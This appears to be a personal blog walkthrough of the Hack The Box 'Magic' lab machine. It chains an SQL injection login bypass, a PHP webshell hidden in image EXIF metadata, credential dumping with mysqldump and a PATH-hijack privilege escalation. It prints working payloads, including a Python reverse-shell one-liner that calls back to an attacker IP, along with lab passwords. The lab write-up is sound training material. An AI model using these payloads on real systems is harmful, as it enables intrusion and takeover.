Magic Machine Walkthrough

Magic Hackthebox Machine Detailed Walkthrough

“Any sufficiently advanced technology is indistinguishable from magic.” - Arthur C. Clarke

Machine Matrix

Machine Summary

Box is a linux machine that has a webserver running whose authentication can be bypassed through SQL Injection. There is a file upload functionality that can be bypassed which grants the low privileged shell. There is a php file which has stored credentials for mysqlservice, we can get the user credentials through accessing the tables. Replacing the fdisk file malicious file (reverse shell) and adding the path grants the root privilege as sysinfo binary indirectly pulls fdisk.

Nmap Scan

I started the enumeration with nmap scan

nmap -sC -sV 10.10.10.185

The box had two ports open

PortService
22SSH
80Apache

Enumeration on port 80

I ran dirbuster that revealed a folder /images/uploads but it was forbidden

But the contents and files of the folder can be accessed

I guessed the inital foothold path i.e i need to find a way to upload a file ( that contains the shell code) and trigger it. I started enumerating on the web application.

Bypassing Authentication Through SQLI

Application had a login page and the authentication can be bypassed through SQL Injection.

'or'1'='1

There is a upload functionality so i tried to put a webshell but i wasn’t able to directly upload it. I also tried to bypass upload restrictions through changing the extension of the file to .php.png and content type from application to image/png but that also failed.

Acquiring Initial Foothold as www-data

Upon researching a bit, i found a way to add a malicious code (web-shell) to meta data of a image file through using exif tool.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg ; mv file.jpg file.php.jpg

Upon loading the file on browser, it looks like crap.

Upon viewing on Burp, it made sense.

In order to get a proper reverse shell, i decided to upload a php reverse shell and triger that

wget http://{IP}/{PORT}

I started the listener on my attacking machine

nc -lvnp {PORT}

I got the initial foothold as www-data.

Acquiring User Shell - Theseus

Upon enumerating the directories i found a juicy file db.php in the directory /var/www/Magic. The file had credentials of the user theseus

dbUsername = theseus
dbPassword = iamkingtheseus

I tried to login over MySQL Service and SSH but both failed.

Upon researching a bit got to know about the command mysqldump that is used to backup, restore and dump the database.

I used that to dump the entire Magic database

mysqldump -u theseus -p Magic

I got a new set of credentials for the user theseus

username: admin
password: Th3s3usW4sK1ng

I tried to login into the theseus account using the obtained password over ssh. I got the user shell

Acquiring Root Privileges

I ran linPeas that gave some information, sysinfo belongs to the root but can be executed by the user theseus. I executed the sysinfo command, it displayed more information then a normal sysinfo command would. After researching a bit, I found that information that gets revealed while executing fdisk command also revealed while executing sysinfo in the machine. binary fdisk is getting executed indirectly when sysinfo is executed

I created a python script that would grant me the reverse shell with the name fdisk

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.54",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I downloaded the file in the victim machine at tmp directory but when sysinfo gets executed fdisk in the bin directory gets executed. so i need to set the path to tmp directory.

export PATH=/tmp/:$PATH

I started the listener in my attacker machine and again executed sysinfo, fdisk in the /tmp/ directory got executed and i got the reverse shell with root privileges.

Happy Hacking !


© 2020. All rights reserved to r3dw0lf_sec.

Powered by Hydejack v9.0.0-rc.6